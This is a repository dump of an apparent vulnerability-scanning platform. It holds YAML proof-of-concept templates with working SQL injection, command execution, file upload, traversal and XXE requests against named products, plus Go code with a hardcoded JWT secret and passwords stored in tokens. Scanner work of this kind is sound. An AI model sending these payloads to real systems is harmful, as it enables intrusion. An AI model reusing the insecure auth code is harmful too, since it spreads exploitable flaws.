-------------------------------------------------------------------------------- /pkg/pocs/xiuno-bbs-cvnd-2019-01348-reinstallation.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xiuno-bbs-cvnd-2019-01348-reinstallation 2 | rules: 3 | - method: GET 4 | path: /install/ 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("/view/js/xiuno.js"))) && response.body.bcontains(bytes(string("Choose Language (选择语言)"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: '=< Xiuno BBS 4.0.4' 13 | links: 14 | - https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 15 | -------------------------------------------------------------------------------- /pkg/pocs/xunchi-cnvd-2020-23735-file-read.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-xunchi-cnvd-2020-23735-file-read 2 | rules: 3 | - method: GET 4 | path: /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 5 | headers: 6 | Accept-Encoding: 'deflate' 7 | follow_redirects: false 8 | expression: | 9 | response.status == 200 && response.body.bcontains(bytes(string("NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"))) && response.body.bcontains(bytes(string("display_errors"))) 10 | detail: 11 | author: 清风明月(www.secbook.info) 12 | influence_version: ' >= V2.3' 13 | links: 14 | - http://www.cnxunchi.com 15 | - https://www.cnvd.org.cn/flaw/show/2025171 16 | -------------------------------------------------------------------------------- /pkg/pocs/yccms-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yccms-rce 2 | set: 3 | r: randomInt(800000000, 1000000000) 4 | r1: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: "/admin/?a=Factory();print({{r}}%2b{{r1}});//../" 8 | expression: | 9 | response.body.bcontains(bytes(string(r + r1))) 10 | detail: 11 | author: j4ckzh0u(https://github.com/j4ckzh0u),violin 12 | yccms: v3.3 13 | links: 14 | - https://blog.csdn.net/qq_36374896/article/details/84839891 15 | -------------------------------------------------------------------------------- /pkg/pocs/yonyou-grp-u8-sqli-to-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-grp-u8-sqli-to-rce 2 | set: 3 | r1: randomInt(1000, 9999) 4 | r2: randomInt(1000, 9999) 5 | rules: 6 | - method: POST 7 | path: /Proxy 8 | follow_redirects: false 9 | body: | 10 | cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'set/A {{r1}}*{{r2}}'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET> 11 | expression: | 12 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 13 | detail: 14 | author: MrP01ntSun(https://github.com/MrPointSun) 15 | links: 16 | - https://www.hackbug.net/archives/111.html 17 | -------------------------------------------------------------------------------- /pkg/pocs/yonyou-grp-u8-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-grp-u8-sqli 2 | set: 3 | r1: randomInt(40000, 44800) 4 | r2: randomInt(40000, 44800) 5 | rules: 6 | - method: POST 7 | path: /Proxy 8 | body: > 9 | cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{r1}}%2a{{r2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e 10 | expression: | 11 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 12 | detail: 13 | author: 凉风(http://webkiller.cn/) 14 | links: 15 | - https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html -------------------------------------------------------------------------------- /pkg/pocs/yonyou-nc-arbitrary-file-upload.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yonyou-nc-arbitrary-file-upload 2 | set: 3 | r1: randomInt(10000, 20000) 4 | r2: randomInt(1000000000, 2000000000) 5 | r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t" 6 | r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx" 7 | rules: 8 | - method: POST 9 | path: /servlet/FileReceiveServlet 10 | headers: 11 | Content-Type: multipart/form-data; 12 | body: >- 13 | {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> 14 | expression: | 15 | response.status == 200 16 | - method: GET 17 | path: '/{{r1}}.jsp' 18 | headers: 19 | Content-Type: application/x-www-form-urlencoded 20 | expression: | 21 | response.status == 200 && response.body.bcontains(bytes(string(r2))) 22 | detail: 23 | author: pa55w0rd(www.pa55w0rd.online/) 24 | Affected Version: "YONYOU NC > 6.5" 25 | links: 26 | - https://blog.csdn.net/weixin_44578334/article/details/110917053 27 | -------------------------------------------------------------------------------- /pkg/pocs/youphptube-encoder-cve-2019-5127.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-youphptube-encoder-cve-2019-5127 2 | set: 3 | fileName: randomLowercase(4) + ".txt" 4 | content: randomLowercase(8) 5 | payload: urlencode(base64("`echo " + content + " > " + fileName + "`")) 6 | rules: 7 | - method: GET 8 | path: /objects/getImage.php?base64Url={{payload}}&format=png 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 12 | - method: GET 13 | path: /objects/{{fileName}} 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(content)) 17 | detail: 18 | author: 0x_zmz(github.com/0x-zmz) 19 | links: 20 | - https://xz.aliyun.com/t/6708 21 | -------------------------------------------------------------------------------- /pkg/pocs/youphptube-encoder-cve-2019-5128.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-youphptube-encoder-cve-2019-5128 2 | set: 3 | fileName: randomLowercase(4) + ".txt" 4 | content: randomLowercase(8) 5 | payload: urlencode(base64("`echo " + content + " > " + fileName + "`")) 6 | rules: 7 | - method: GET 8 | # TODO: url escape base64 9 | path: /objects/getImageMP4.php?base64Url={{payload}}&format=jpg 10 | follow_redirects: true 11 | expression: | 12 | response.status == 200 13 | - method: GET 14 | path: /objects/{{fileName}} 15 | follow_redirects: true 16 | expression: | 17 | response.status == 200 && response.body.bcontains(bytes(content)) 18 | detail: 19 | author: 0x_zmz(github.com/0x-zmz) 20 | links: 21 | - https://xz.aliyun.com/t/6708 22 | -------------------------------------------------------------------------------- /pkg/pocs/youphptube-encoder-cve-2019-5129.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-youphptube-encoder-cve-2019-5129 2 | set: 3 | fileName: randomLowercase(4) + ".txt" 4 | content: randomLowercase(8) 5 | payload: urlencode(base64("`echo " + content + " > " + fileName + "`")) 6 | rules: 7 | - method: GET 8 | path: /objects/getSpiritsFromVideo.php?base64Url={{payload}}&format=jpg 9 | follow_redirects: true 10 | expression: | 11 | response.status == 200 12 | - method: GET 13 | path: /objects/{{fileName}} 14 | follow_redirects: true 15 | expression: | 16 | response.status == 200 && response.body.bcontains(bytes(content)) 17 | detail: 18 | author: 0x_zmz(github.com/0x-zmz) 19 | links: 20 | - https://xz.aliyun.com/t/6708 21 | -------------------------------------------------------------------------------- /pkg/pocs/yungoucms-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-yungoucms-sqli 2 | set: 3 | rand: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /?/member/cart/Fastpay&shopid=-1%20union%20select%20md5({{rand}}),2,3,4%20--+ 8 | follow_redirects: false 9 | expression: > 10 | response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) 11 | detail: 12 | author: cc_ci(https://github.com/cc8ci) 13 | links: 14 | - https://www.secquan.org/Prime/1069179 -------------------------------------------------------------------------------- /pkg/pocs/zabbix-authentication-bypass.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-authentication-bypass 2 | rules: 3 | - method: GET 4 | path: /zabbix.php?action=dashboard.view&dashboardid=1 5 | follow_redirects: false 6 | expression: | 7 | response.status == 200 && response.body.bcontains(bytes("<a class=\"top-nav-zbbshare\" target=\"_blank\" title=\"Zabbix Share\" href=\"https://share.zabbix.com/\">Share</a>")) && response.body.bcontains(b"<title>Dashboard") 8 | detail: 9 | author: FiveAourThe(https://github.com/FiveAourThe) 10 | links: 11 | - https://www.exploit-db.com/exploits/47467 -------------------------------------------------------------------------------- /pkg/pocs/zabbix-cve-2016-10134-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zabbix-cve-2016-10134-sqli 2 | set: 3 | r: randomInt(2000000000, 2100000000) 4 | rules: 5 | - method: GET 6 | path: >- 7 | /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0) 8 | follow_redirects: true 9 | expression: | 10 | response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31))) 11 | detail: 12 | author: sharecast 13 | links: 14 | - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134 -------------------------------------------------------------------------------- /pkg/pocs/zcms-v3-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zcms-v3-sqli 2 | rules: 3 | - method: GET 4 | path: >- 5 | /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b 6 | follow_redirects: true 7 | expression: | 8 | response.status == 200 && response.body.bcontains(b"6f7c6dcbc380aac3bcba1f9fccec991e") 9 | detail: 10 | author: MaxSecurity(https://github.com/MaxSecurity) 11 | links: 12 | - https://www.anquanke.com/post/id/183241 13 | -------------------------------------------------------------------------------- /pkg/pocs/zeit-nodejs-cve-2020-5284-directory-traversal.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zeit-nodejs-cve-2020-5284-directory-traversal 2 | rules: 3 | - method: GET 4 | path: /_next/static/../server/pages-manifest.json 5 | expression: | 6 | response.status == 200 && response.headers["Content-Type"].contains("application/json") && "/_app\": \".*?_app\\.js".bmatches(response.body) 7 | detail: 8 | author: x1n9Qi8 9 | links: 10 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-1728 11 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5284 -------------------------------------------------------------------------------- /pkg/pocs/zeroshell-cve-2019-12725-rce.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zeroshell-cve-2019-12725-rce 2 | set: 3 | r1: randomInt(800000000, 1000000000) 4 | r2: randomInt(800000000, 1000000000) 5 | rules: 6 | - method: GET 7 | path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22expr%20{{r1}}%20%2b%20{{r2}}%22%0A%27 8 | follow_redirects: false 9 | expression: | 10 | response.body.bcontains(bytes(string(r1 + r2))) && response.status == 200 11 | detail: 12 | author: 1au 13 | links: 14 | - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12725 15 | -------------------------------------------------------------------------------- /pkg/pocs/zimbra-cve-2019-9670-xxe.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zimbra-cve-2019-9670-xxe 2 | rules: 3 | - method: POST 4 | path: /Autodiscover/Autodiscover.xml 5 | headers: 6 | Content-Type: text/xml 7 | body: >- 8 | ]>test@test.com&xxe; 9 | follow_redirects: false 10 | expression: | 11 | response.body.bcontains(b"zmmailboxd.out") && response.body.bcontains(b"Requested response schema not available") 12 | detail: 13 | author: fnmsd(https://blog.csdn.net/fnmsd) 14 | cve-id: CVE-2019-9670 15 | vuln_path: /Autodiscover/Autodiscover.xml 16 | description: Zimbra XXE Vul,may Control your Server with AdminPort SSRF 17 | links: 18 | - https://blog.csdn.net/fnmsd/article/details/88657083 19 | - https://blog.csdn.net/fnmsd/article/details/89235589 -------------------------------------------------------------------------------- /pkg/pocs/zzcms-zsmanage-sqli.yml: -------------------------------------------------------------------------------- 1 | name: poc-yaml-zzcms-zsmanage-sqli 2 | set: 3 | r0: randomLowercase(6) 4 | r1: randomInt(40000, 44800) 5 | r2: randomInt(40000, 44800) 6 | rules: 7 | - method: POST 8 | path: /user/zs.php?do=save 9 | headers: 10 | Content-Type: application/x-www-form-urlencoded 11 | body: >- 12 | proname={{r0}}&tz=1%E4%B8%87%E4%BB%A5%E4%B8%8B&prouse={{r0}}&sx%5B%5D=&sx%5B%5D=&sm={{r0}}&province=%E5%85%A8%E5%9B%BD&city=%E5%85%A8%E5%9B%BD%E5%90%84%E5%9C%B0%E5%8C%BA&xiancheng=&cityforadd=&img=%2Fimage%2Fnopic.gif&flv=&zc=&yq=&action=add&Submit=%E5%A1%AB%E5%A5%BD%E4%BA%86%EF%BC%8C%E5%8F%91%E5%B8%83%E4%BF%A1%E6%81%AF&smallclassid[]=1&smallclassid[]=2)%20union%20select%20{{r1}}*{{r2}}%23 13 | follow_redirects: true 14 | expression: | 15 | response.status == 200 16 | - method: GET 17 | path: /user/zsmanage.php 18 | follow_redirects: true 19 | expression: | 20 | response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) 21 | detail: 22 | author: JingLing(https://hackfun.org/) 23 | version: zzcms201910 24 | links: 25 | - https://github.com/JcQSteven/blog/issues/18 26 | -------------------------------------------------------------------------------- /pkg/setting/section.go: -------------------------------------------------------------------------------- 1 | package setting 2 | 3 | import ( 4 | "time" 5 | ) 6 | 7 | type ServerSettingS struct { 8 | RunMode string 9 | HttpPort int 10 | ReadTimeout time.Duration 11 | WriteTimeout time.Duration 12 | } 13 | 14 | type AppSettingS struct { 15 | DefaultPageSize int 16 | MaxPageSize int 17 | DefaultContextTimeout time.Duration 18 | JwtSecret string 19 | PortUserDict string 20 | PortPassDict string 21 | } 22 | 23 | type DatabaseSettingS struct { 24 | DBType string 25 | UserName string 26 | Password string 27 | Host string 28 | DBName string 29 | TablePrefix string 30 | Charset string 31 | ParseTime bool 32 | MaxIdleConns int 33 | MaxOpenConns int 34 | } 35 | 36 | type MasscanSettingS struct { 37 | Rate string 38 | IpFile string 39 | IpNotScan string 40 | Port string 41 | } 42 | 43 | var sections = make(map[string]interface{}) 44 | 45 | func (s *Setting) ReadSection(k string, v interface{}) error { 46 | err := s.vp.UnmarshalKey(k, v) 47 | if err != nil { 48 | return err 49 | } 50 | 51 | if _, ok := sections[k]; !ok { 52 | sections[k] = v 53 | } 54 | return nil 55 | } 56 | 57 | func (s *Setting) ReloadAllSection() error { 58 | for k, v := range sections { 59 | err := s.ReadSection(k, v) 60 | if err != nil { 61 | return err 62 | } 63 | } 64 | 65 | return nil 66 | } 67 | -------------------------------------------------------------------------------- /pkg/setting/setting.go: -------------------------------------------------------------------------------- 1 | package setting 2 | 3 | import ( 4 | "github.com/spf13/viper" 5 | ) 6 | 7 | type Setting struct { 8 | vp *viper.Viper 9 | } 10 | 11 | func NewSetting(configs ...string) (*Setting, error) { 12 | vp := viper.New() 13 | vp.SetConfigName("config") 14 | for _, config := range configs { 15 | if config != "" { 16 | vp.AddConfigPath(config) 17 | } 18 | } 19 | vp.SetConfigType("yaml") 20 | err := vp.ReadInConfig() 21 | if err != nil { 22 | return nil, err 23 | } 24 | 25 | s := &Setting{vp} 26 | return s, nil 27 | } 28 | -------------------------------------------------------------------------------- /pkg/third/xray_linux_amd64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/pkg/third/xray_linux_amd64 -------------------------------------------------------------------------------- /pkg/utils.go: -------------------------------------------------------------------------------- 1 | package pkg 2 | 3 | import ( 4 | "crypto/md5" 5 | "fmt" 6 | "io" 7 | "linglong/models" 8 | "sync" 9 | ) 10 | 11 | var ( 12 | aliveIpList []models.IpAddr 13 | mutex sync.Mutex 14 | ) 15 | 16 | func init() { 17 | aliveIpList = make([]models.IpAddr, 0) 18 | } 19 | 20 | func MD5(s string) (m string) { 21 | h := md5.New() 22 | io.WriteString(h, s) 23 | return fmt.Sprintf("%x", h.Sum(nil)) 24 | } 25 | 26 | func MakeTaskHash(k string) string { 27 | hash := MD5(k) 28 | return hash 29 | } 30 | -------------------------------------------------------------------------------- /pkg/utils/jwt.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "fmt" 5 | "github.com/dgrijalva/jwt-go" 6 | //"linglong/global" 7 | "time" 8 | ) 9 | 10 | var jwtSecret = []byte("213123dd1") 11 | 12 | type Claims struct { 13 | Username string `json:"username"` 14 | Password string `json:"password"` 15 | jwt.StandardClaims 16 | } 17 | 18 | 19 | func GenerateToken(username, password string) (string, error) { 20 | fmt.Println("GenerateToken") 21 | nowTime := time.Now() 22 | expireTime := nowTime.Add(3 * time.Hour) 23 | 24 | claims := Claims{ 25 | username, 26 | password, 27 | jwt.StandardClaims{ 28 | ExpiresAt: expireTime.Unix(), 29 | Issuer: "linglong", 30 | }, 31 | } 32 | 33 | tokenClaims := jwt.NewWithClaims(jwt.SigningMethodHS256, claims) 34 | token, err := tokenClaims.SignedString(jwtSecret) 35 | 36 | return token, err 37 | } 38 | 39 | func ParseToken(token string) (*Claims, error) { 40 | tokenClaims, err := jwt.ParseWithClaims(token, &Claims{}, func(token *jwt.Token) (interface{}, error) { 41 | return jwtSecret, nil 42 | }) 43 | 44 | if tokenClaims != nil { 45 | if claims, ok := tokenClaims.Claims.(*Claims); ok && tokenClaims.Valid { 46 | return claims, nil 47 | } 48 | } 49 | 50 | return nil, err 51 | } 52 | -------------------------------------------------------------------------------- /pkg/utils/pagination.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "github.com/gin-gonic/gin" 5 | "github.com/unknwon/com" 6 | "strconv" 7 | ) 8 | 9 | func GetPage(c *gin.Context) int { 10 | result := 0 11 | pagesizetmp := c.Query("pagesize") 12 | pagesize, _ := strconv.Atoi(pagesizetmp) 13 | 14 | page, _ := com.StrTo(c.Query("pagenum")).Int() 15 | if page > 0 { 16 | result = (page - 1) * pagesize 17 | } 18 | 19 | return result 20 | } 21 | -------------------------------------------------------------------------------- /routers/api/auth.go: -------------------------------------------------------------------------------- 1 | package api 2 | 3 | import ( 4 | "github.com/gin-gonic/gin" 5 | "linglong/models" 6 | "linglong/pkg/e" 7 | "github.com/astaxie/beego/validation" 8 | "linglong/pkg/utils" 9 | "log" 10 | "net/http" 11 | ) 12 | 13 | type auth struct { 14 | Username string `valid:"Required; MaxSize(50)"` 15 | Password string `valid:"Required; MaxSize(50)"` 16 | } 17 | 18 | func GetAuth(c *gin.Context) { 19 | username := c.Query("username") 20 | password := c.Query("password") 21 | 22 | valid := validation.Validation{} 23 | a := auth{Username: username, Password: password} 24 | ok, _ := valid.Valid(&a) 25 | 26 | data := make(map[string]interface{}) 27 | code := e.INVALID_PARAMS 28 | if ok { 29 | isExist := models.CheckAuth(username, password) 30 | if isExist { 31 | token, err := utils.GenerateToken(username, password) 32 | if err != nil { 33 | code = e.ERROR 34 | } else { 35 | data["token"] = token 36 | code = e.SUCCESS 37 | } 38 | 39 | } else { 40 | code = e.ERROR 41 | } 42 | } else { 43 | for _, err := range valid.Errors { 44 | log.Println(err.Key, err.Message) 45 | } 46 | } 47 | 48 | c.JSON(http.StatusOK, gin.H{ 49 | "code" : code, 50 | "msg" : e.GetMsg(code), 51 | "data" : data, 52 | }) 53 | } 54 | -------------------------------------------------------------------------------- /routers/api/v1/log.go: -------------------------------------------------------------------------------- 1 | package v1 2 | 3 | import ( 4 | "github.com/gin-gonic/gin" 5 | "linglong/models" 6 | "linglong/pkg/e" 7 | "linglong/pkg/utils" 8 | "net/http" 9 | ) 10 | 11 | //任务列表 12 | func GetLogList(c *gin.Context) { 13 | name := c.Query("name") 14 | 15 | maps := make(map[string]interface{}) 16 | data := make(map[string]interface{}) 17 | 18 | if name != "" { 19 | maps["name"] = name 20 | } 21 | 22 | code := e.SUCCESS 23 | 24 | data["lists"] = models.GetLog(utils.GetPage(c), 10, maps) 25 | data["total"] = models.GetLogTotal(maps) 26 | 27 | c.JSON(http.StatusOK, gin.H{ 28 | "code": code, 29 | "msg": e.GetMsg(code), 30 | "data": data, 31 | }) 32 | } 33 | -------------------------------------------------------------------------------- /routers/api/v1/webloginlist.go: -------------------------------------------------------------------------------- 1 | package v1 2 | 3 | import ( 4 | "github.com/gin-gonic/gin" 5 | "linglong/models" 6 | "linglong/pkg/e" 7 | "linglong/pkg/utils" 8 | "net/http" 9 | ) 10 | 11 | func GetWebloginlist(c *gin.Context) { 12 | title := c.Query("title") 13 | 14 | maps := make(map[string]interface{}) 15 | data := make(map[string]interface{}) 16 | 17 | if title != "" { 18 | maps["title"] = title 19 | } 20 | 21 | 22 | code := e.SUCCESS 23 | 24 | data["lists"] = models.GetWebloginlist(utils.GetPage(c), 10, maps) 25 | data["total"] = models.GetWebloginlistTotal(maps) 26 | 27 | c.JSON(http.StatusOK, gin.H{ 28 | "code": code, 29 | "msg": e.GetMsg(code), 30 | "data": data, 31 | }) 32 | } 33 | 34 | //查询 35 | //func GetWebloginlistSearch(c *gin.Context) { 36 | // code := e.INVALID_PARAMS 37 | // valid := validation.Validation{} 38 | // data := make(map[string]interface{}) 39 | // maps := make(map[string]interface{}) 40 | // title := c.Query("title") 41 | // 42 | // if ! valid.HasErrors() { 43 | // data["lists"] = models.GetWebloginlist(utils.GetPage(c), 10, maps,title) 44 | // data["total"] = models.GetWebloginlistTotal(maps) 45 | // code = e.SUCCESS 46 | // } else { 47 | // for _, err := range valid.Errors { 48 | // log.Printf("err.key: %s, err.message: %s", err.Key, err.Message) 49 | // } 50 | // } 51 | // 52 | // c.JSON(http.StatusOK, gin.H{ 53 | // "code": code, 54 | // "msg": e.GetMsg(code), 55 | // "data": data, 56 | // }) 57 | //} 58 | -------------------------------------------------------------------------------- /routers/api/v1/xrayres.go: -------------------------------------------------------------------------------- 1 | package v1 2 | 3 | import ( 4 | "github.com/astaxie/beego/validation" 5 | "github.com/gin-gonic/gin" 6 | "github.com/unknwon/com" 7 | "linglong/models" 8 | "linglong/pkg/e" 9 | "linglong/pkg/utils" 10 | "net/http" 11 | ) 12 | 13 | func GetXrayres(c *gin.Context) { 14 | url := c.Query("url") 15 | poc := c.Query("poc") 16 | snapshot := c.Query("snapshot") 17 | 18 | maps := make(map[string]interface{}) 19 | data := make(map[string]interface{}) 20 | 21 | if url != "" { 22 | maps["url"] = url 23 | } 24 | if poc != "" { 25 | maps["poc"] = poc 26 | } 27 | if snapshot != "" { 28 | maps["snapshot"] = snapshot 29 | } 30 | 31 | code := e.SUCCESS 32 | 33 | data["lists"] = models.GetXrayres(utils.GetPage(c), 10, maps) 34 | data["total"] = models.GetXrayresTotal(maps) 35 | 36 | c.JSON(http.StatusOK, gin.H{ 37 | "code": code, 38 | "msg": e.GetMsg(code), 39 | "data": data, 40 | }) 41 | } 42 | 43 | func DeleteXrayres(c *gin.Context) { 44 | 45 | id := com.StrTo(c.Param("id")).MustInt() 46 | valid := validation.Validation{} 47 | valid.Required(id, "id").Message("id不能为空") 48 | 49 | code := e.INVALID_PARAMS 50 | if !valid.HasErrors() { 51 | models.DeleteXrayres(id) 52 | code = e.SUCCESS 53 | 54 | } 55 | 56 | c.JSON(http.StatusOK, gin.H{ 57 | "code": code, 58 | "msg": e.GetMsg(code), 59 | "data": make(map[string]string), 60 | }) 61 | 62 | } 63 | -------------------------------------------------------------------------------- /routers/tools/nmap/nmap.go: -------------------------------------------------------------------------------- 1 | package nmap 2 | 3 | import ( 4 | "context" 5 | "github.com/Ullaakut/nmap" 6 | "log" 7 | "strconv" 8 | "time" 9 | ) 10 | 11 | func NmapScan(ip string, port string) (resip, resport, resprotocol string) { 12 | ctx, cancel := context.WithTimeout(context.Background(), 1000*time.Minute) 13 | defer cancel() 14 | 15 | scanner, err := nmap.NewScanner( 16 | nmap.WithTargets(ip), 17 | nmap.WithPorts(port), 18 | nmap.WithContext(ctx), 19 | nmap.WithSkipHostDiscovery(), // s.args = append(s.args, "-Pn") 加上 -Pn 就不去ping主机,因为有的主机防止ping,增加准确度 20 | ) 21 | if err != nil { 22 | log.Fatalf("unable to create nmap scanner: %v", err) 23 | return 24 | } 25 | 26 | result, warnings, err := scanner.Run() 27 | if err != nil { 28 | log.Fatalf("Unable to run nmap scan: %v", err) 29 | return 30 | } 31 | 32 | if warnings != nil { 33 | log.Printf("Warnings: \n %v", warnings) 34 | } 35 | 36 | // Use the results to print an example output 37 | for _, host := range result.Hosts { 38 | if len(host.Ports) == 0 || len(host.Addresses) == 0 { 39 | continue 40 | } 41 | 42 | for _, port := range host.Ports { 43 | if port.State.State == "open" { 44 | if port.Service.Name == "microsoft-ds" { 45 | port.Service.Name = "SMB" 46 | } 47 | 48 | b := strconv.Itoa(int(port.ID)) 49 | c := string(b) 50 | return host.Addresses[0].String(), c , port.Service.Name 51 | } 52 | return 53 | } 54 | return 55 | } 56 | return 57 | 58 | } 59 | -------------------------------------------------------------------------------- /web/.env: -------------------------------------------------------------------------------- 1 | VUE_APP_BASE_API = '/api/v1' 2 | 3 | -------------------------------------------------------------------------------- /web/Dockerfile: -------------------------------------------------------------------------------- 1 | #FROM node:latest as build-stage 2 | # 3 | #MAINTAINER drunk_kk 4 | # 5 | #RUN npm install -g cnpm --registry=https://registry.npm.taobao.org 6 | # 7 | #WORKDIR /app 8 | # 9 | #COPY . . 10 | # 11 | #RUN rm -rf node_modules \ 12 | # && npm install node-sass \ 13 | # && cnpm run build 14 | 15 | FROM nginx:1.15.3-alpine as production-stage 16 | 17 | COPY ./nginx.conf /etc/nginx/nginx.conf 18 | 19 | COPY ./dist /usr/share/nginx/html 20 | #COPY --from=build-stage /app/dist /usr/share/nginx/html 21 | 22 | EXPOSE 8001 23 | 24 | CMD ["nginx", "-g", "daemon off;"] 25 | -------------------------------------------------------------------------------- /web/babel.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | presets: [ 3 | '@vue/cli-plugin-babel/preset' 4 | ], 5 | plugins: [ 6 | [ 7 | 'component', 8 | { 9 | libraryName: 'element-ui', 10 | styleLibraryName: 'theme-chalk' 11 | } 12 | ] 13 | ] 14 | } 15 | -------------------------------------------------------------------------------- /web/dist/12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/12.png -------------------------------------------------------------------------------- /web/dist/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/favicon.ico -------------------------------------------------------------------------------- /web/dist/fonts/element-icons.535877f5.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/fonts/element-icons.535877f5.woff -------------------------------------------------------------------------------- /web/dist/fonts/element-icons.732389de.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/fonts/element-icons.732389de.ttf -------------------------------------------------------------------------------- /web/dist/img/all.ba8c4734.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/img/all.ba8c4734.png -------------------------------------------------------------------------------- /web/dist/img/bg.8e171a3c.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/img/bg.8e171a3c.png -------------------------------------------------------------------------------- /web/dist/img/ipall.777d2626.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/img/ipall.777d2626.png -------------------------------------------------------------------------------- /web/dist/img/logo.46db48c9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/awake1t/linglong/bedbe49597412abab1c1635e133957d782e65325/web/dist/img/logo.46db48c9.png -------------------------------------------------------------------------------- /web/dist/index.html: -------------------------------------------------------------------------------- 1 | web
